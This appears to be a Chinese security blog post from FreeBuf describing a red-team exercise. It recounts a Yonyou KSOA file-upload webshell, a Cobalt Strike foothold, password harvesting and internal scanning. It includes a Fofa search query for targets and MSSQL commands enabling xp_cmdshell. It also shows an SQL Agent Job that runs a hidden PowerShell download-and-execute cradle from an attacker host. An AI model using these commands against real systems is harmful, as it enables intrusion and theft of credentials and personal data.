freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

点我创作

试试在FreeBuf发布您的第一篇文章 让安全圈留下您的足迹
我知道了

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

0

1

2

3

4

5

6

7

8

9

记某次HVV:文件上传打入内网
玄知安全实验室 2024-02-26 21:52:18 127736

免责声明

本文仅用于参考和学习交流,对于使用本文所提供的信息所造成的任何直接或间接的后果和损失,使用者需自行承担责任。本文的作者对此不承担任何责任。请在使用本文内容时谨慎评估风险并做出独立判断。谢谢!

前言

某次地市hvv发现一个某友文件上传漏洞,通过扫描内网网段,发现大量数据库弱口令,主机密码复用,及MS-17010。

个人认为本文比较重要的是mssql通过Agent Job执行无回显命令上线CS(我试了好几种最后就这个成功了),还有翻数据(数据库,照片或者表格)和密码本(桌面应用程序抓密码、txt\xlsx\doc等文档、浏览器历史密码),内网渗透主打就是一个认真仔细,登上内网机器一定要翻个底朝天。

由于数据敏感性,这里只截取一些片段讲解,给大家提供一个思路。

正文

用友文件上传漏洞

Fofa语法:app="用友-时空KSOA" &&city="城市/地区"

恰好,逮到一个文件上传,上传天蝎马。

1708954999_65dc95778bee551257be6.png!small?1708955000411

连接webshell。

1708955035_65dc959b64e4b6150a598.png!small?1708955036202

上线CS

上传免杀马上线CS,使用CS自带插件提权到system权限。

1708955073_65dc95c10b3d13665bf53.png!small?1708955074093

使用CS插件,开启3389端口,增加一个管理员用户,建立隧道然后远程连接该主机。

1708955109_65dc95e514ccdaeb1349f.png!small?1708955109861

接下来就是在这台机器上,翻数据和密码,这里就不截图了。

最后上传fscan,在这台机器上扫描B段资产或C段资产,为后续打内网其他机器做好信息收集工作。

数据库弱口令到上线CS

在第二步的信息收集中,找到一个某桌面应用程序,上传星号密码查看器,抓取到另一台主机的mssql数据库密码。

在第二步的信息收集中,找到一个某桌面应用程序,上传星号密码查看器,抓取到另一台主机的mssql数据库密码。

1708955212_65dc964cc142a5ab25675.png!small?1708955213566

连接数据库,使用xp_cmdshell进行提权

#开启xp_cmdshell
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;-- 开启xp_cmdshell
#命令执行
EXEC master..xp_cmdshell 'whoami'
#关闭xp_cmdshell
EXEC sp_configure 'show advanced options', 0;RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;
EXEC sp_configure 'show advanced options', 0; GO RECONFIGURE; -- 禁用advanced options

1708955288_65dc96982e4ff4d588ac5.png!small?1708955288899

通过Agent Job执行无回显命令上线CS

USE msdb; EXEC dbo.sp_add_job @job_name = N'test_powershell_job1'; EXEC sp_add_jobstep @job_name = N'test_powershell_job1',@step_name = N'test_powershell_name1', @subsystem = N'PowerShell',@command = N'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring("http://X.X.X.X:80/a"))"', @retry_attempts = 1, @retry_interval = 5 ;EXEC dbo.sp_add_jobserver @job_name = N'test_powershell_job1'; EXEC dbo.sp_start_job N'test_powershell_job1';  //X.X.X.X为攻击鸡地址

1708955333_65dc96c527bd529d94b55.png!small?1708955334198

接着继续翻这台机器上的数据和密码,我翻到小4W条用户名、地址、密码等敏感信息,这里不截图了。

MS17-010上线CS

通过fscan扫描B段的信息收集结果,打了一个MS17-010。

msf使用ms17-010攻击模块攻击,进入到shell模式后,使用powershell方式上线CS。

1708955369_65dc96e9245ec09b20466.png!small?1708955370079

1708955391_65dc96ff5d1a683e1d357.png!small?1708955392107

接着的思路和上面的一样,就是增管理员用户,开3389,远程连接,继续翻密码还有数据。

# 漏洞 # 渗透测试 # 网络安全 # web安全 # 网络安全技术
免责声明
1.一般免责声明:本文所提供的技术信息仅供参考,不构成任何专业建议。读者应根据自身情况谨慎使用且应遵守《中华人民共和国网络安全法》,作者及发布平台不对因使用本文信息而导致的任何直接或间接责任或损失负责。
2. 适用性声明:文中技术内容可能不适用于所有情况或系统,在实际应用前请充分测试和评估。若因使用不当造成的任何问题,相关方不承担责任。
3. 更新声明:技术发展迅速,文章内容可能存在滞后性。读者需自行判断信息的时效性,因依据过时内容产生的后果,作者及发布平台不承担责任。
本文为 玄知安全实验室 独立观点,未经授权禁止转载。
如需授权、对文章有疑问或需删除稿件,请联系 FreeBuf 客服小蜜蜂(微信:freebee1024)
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
攻防演练
玄知安全实验室 LV.4
这家伙太懒了,还未填写个人描述!
  • 10 文章数
  • 20 关注者
漏洞挖掘 | 通过API接口拿到CNVD证书
2024-02-18
Frida练习靶场(下篇)
2024-01-26
Frida练习靶场(上篇)
2024-01-26
文章目录